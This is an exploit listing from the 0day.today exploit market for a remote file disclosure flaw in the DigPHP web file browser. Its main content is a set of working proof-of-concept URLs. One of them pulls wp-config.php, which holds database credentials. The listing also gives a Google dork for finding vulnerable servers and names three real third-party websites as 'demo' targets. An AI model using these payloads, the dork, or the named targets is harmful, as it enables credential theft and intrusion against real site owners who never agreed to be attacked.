[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DigPHP - Web Based File Browser <= Remote File Disclosure Vulnerability

Author
Ryuzaki Lawlet
Risk
[
Security Risk High
]
0day-ID
0day-ID-18837
Category
web applications
Date add
26-06-2012
Platform
php
##################################################
# Exploit Title: DigPHP - Web Based File Browser <= Remote File Disclosure Vulnerability
# Date: 26/06/2012
# Author: Ryuzaki Lawlet
# Web/Blog: http://justryuz.blogspot.com
# Category: webapps
# version: -
# Vendor or Software Link: http://sourceforge.net/projects/digphp/
# Google dork: inurl:/dig.php?dir=./
# Tested on: Linux
##################################################
[~]Exploit/p0c :

http://localhost:80/dig.php?ns=
http://localhost:80/dig.php?action=file&dir=./&name=wp-config.php&ext=php

[~]Dem0 :

http://geo.wagner.free.fr/dig.php?action=file&dir=
http://pratclif.com/dig.php?dir=
http://ratcliffephotos.free.fr/dig.php?dir=

FB : www.fb.me/justryuz
+---------------------------------------------------+
  Greetz to :
[ CyberSEC,Newbie3vilc063s,Rileks Crew,h3x4 Crew,C4,T3D Hackers,]
[ Antuwebhunter = Sbkiller CyberSEC = Misa CyberSEC = Ben CyberSEC = Xay CyberSEC ]
[ And all my Freinds + Malaysian + Indonesia + Gaza + Turki + GaySec + Xadna ]
-----------------------------------------------------+



#  0day.today [2024-11-15]  #